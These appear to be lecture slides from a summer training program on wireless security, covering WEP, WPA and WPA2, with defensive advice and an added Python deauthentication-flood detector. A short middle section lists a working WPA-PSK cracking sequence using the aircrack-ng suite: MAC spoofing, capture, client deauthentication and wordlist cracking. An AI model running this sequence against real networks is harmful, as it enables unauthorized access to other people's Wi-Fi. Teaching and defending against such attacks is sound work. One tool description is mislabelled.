Summer Training Program (www.wegversity.com/stp)
Wireless Networks and Security
What are Wireless Networks?
A wireless network is the way that a computer is connected to a
router without a physical link.
Why security?
An attacker may hack a victim's personal computer and steal his/her
personal pictures and documents, or may perform illegal
activities or crimes using the victim's machine and ID.
Three security approaches:
WEP (Wired Equivalent Privacy)
WPA (Wi-Fi Protected Access)
WPA2 (Wi-Fi Protected Access, Version 2)
WEP and its problems
Designed to provide the security of a wired LAN by encrypting
traffic with the RC4 algorithm on both sides of a data
communication.
Problems:
The IV is short (24 bits) and is reused
Problems in the RC4 algorithm
Easy forging of authentication messages [1]
WPA
Enterprise WPA or Commercial WPA: Authentication is performed
by an 802.1X authentication server, which provides control and
security for the users' traffic on the wireless network. No shared
key is used.
Improvements:
A cryptographic message integrity code, or MIC, to defeat forgeries.
A new IV sequencing authority, to avoid replay attacks.
A per-packet key mixing function, to de-correlate the public IVs from weak keys.
A rekeying mechanism, to provide fresh encryption and integrity keys, undoing the threat of attacks stemming from key reuse. [2]
Problem
Attacking a WPA-PSK network is possible.
The Attack
airmon-ng
macchanger -s [Interface]
airodump-ng [The hacker's station interface]
airodump-ng --bssid [MAC of Router] -w [FILENAME] -c [CHANNEL] [ADAPTER]
aireplay-ng -0 15 -a [MAC OF ROUTER] -c [MAC OF SYSTEM ON NETWORK] [ADAPTER]
aircrack-ng -e [ESSID - Name of network] -w [WORDLIST] [FILENAME.cap]
Tools Description: aircrack-ng
aircrack-ng is an 802.11 WEP and WPA-PSK key-cracking
program that can recover keys once enough data packets
have been captured.
Tools Description: aircrack-ng
The primary function is to generate traffic for later use in
aircrack-ng to crack the WEP and WPA-PSK keys.
Tools Description: macchanger -s
In some situations you need to fake / change / spoof the MAC
address of your network interface.
Tools Description: airodump-ng
Airodump-ng is used for capturing raw 802.11
frames and is particularly suitable for collecting WEP IVs
(Initialization Vectors) with the intent of using them with
aircrack-ng. If you have a GPS receiver connected to the
computer, airodump-ng is capable of logging the coordinates
of the access points it finds.
Defense
None of the attack methods is fast or effective when a
longer passphrase is used.
Hide the SSID
MAC filtering: maintain an access control list
Do not allow MAC de-authentication
Letter-envelope protocol [4]
Stop the attacker from acquiring client signals
iJam [5]
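The de-authentication step in the attack above (aireplay-ng -0 15) shows up on the air as a burst of deauthentication frames, which a monitoring station can flag. The following is an added example, not part of the original slides: a sliding-window detector run over constructed frame records. The record format, the 5-second window, the threshold of 10 and the MAC addresses are all assumptions chosen for illustration.

```python
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12   # 802.11 management frame subtype: deauthentication
WINDOW_S = 5.0        # assumed sliding window, in seconds
THRESHOLD = 10        # assumed: more deauths than this per window is suspicious
BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_floods(frames, window=WINDOW_S, threshold=THRESHOLD):
    """Return one alert per (bssid, client) pair that sees a deauth burst.

    frames: dicts with keys ts, type, subtype, src, dst, bssid, sorted by ts
    (a hypothetical record format, e.g. exported from a monitor-mode capture).
    """
    recent = defaultdict(deque)   # (bssid, client) -> timestamps inside window
    alerted, alerts = set(), []
    for f in frames:
        if f["type"] != 0 or f["subtype"] != DEAUTH_SUBTYPE:
            continue              # only management/deauthentication frames
        # The client is whichever address is not the AP, so deauths forged
        # in either direction count against the same pair.
        client = f["dst"] if f["src"] == f["bssid"] else f["src"]
        key = (f["bssid"], client)
        q = recent[key]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:
            q.popleft()           # drop timestamps that left the window
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": key[0], "client": client,
                           "count": len(q), "first_seen": q[0],
                           "broadcast": client == BROADCAST})
    return alerts

# Constructed sample: one ordinary deauth, one data frame, then 30 deauths
# alternating direction between the AP and one client within 1.5 seconds.
AP, STA1, STA2 = "02:00:00:aa:bb:01", "02:00:00:cc:dd:02", "02:00:00:cc:dd:03"

def sample_frames():
    frames = [
        {"ts": 1.0, "type": 0, "subtype": 12, "src": STA2, "dst": AP, "bssid": AP},
        {"ts": 2.0, "type": 2, "subtype": 0, "src": STA1, "dst": AP, "bssid": AP},
    ]
    for i in range(30):
        src, dst = (AP, STA1) if i % 2 == 0 else (STA1, AP)
        frames.append({"ts": 10.0 + i * 0.05, "type": 0, "subtype": 12,
                       "src": src, "dst": dst, "bssid": AP})
    return frames

if __name__ == "__main__":
    for alert in detect_deauth_floods(sample_frames()):
        print(alert)
```

A single deauthentication from a client that is leaving the network stays below the threshold, so only the burst raises an alert.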
WPA 2
WPA2, like WPA, supports two modes of security, sometimes
referred to as home user and corporate.
The corporate security is based on 802.1X, the EAP
authentication framework (including RADIUS), one of several
EAP types (such as EAP-TLS, which provides a much stronger
authentication system), and secure key distribution.
Conclusion
We show that WPA can also be attacked and we can defend
against such an attack by following the approaches
mentioned.
Thank you!!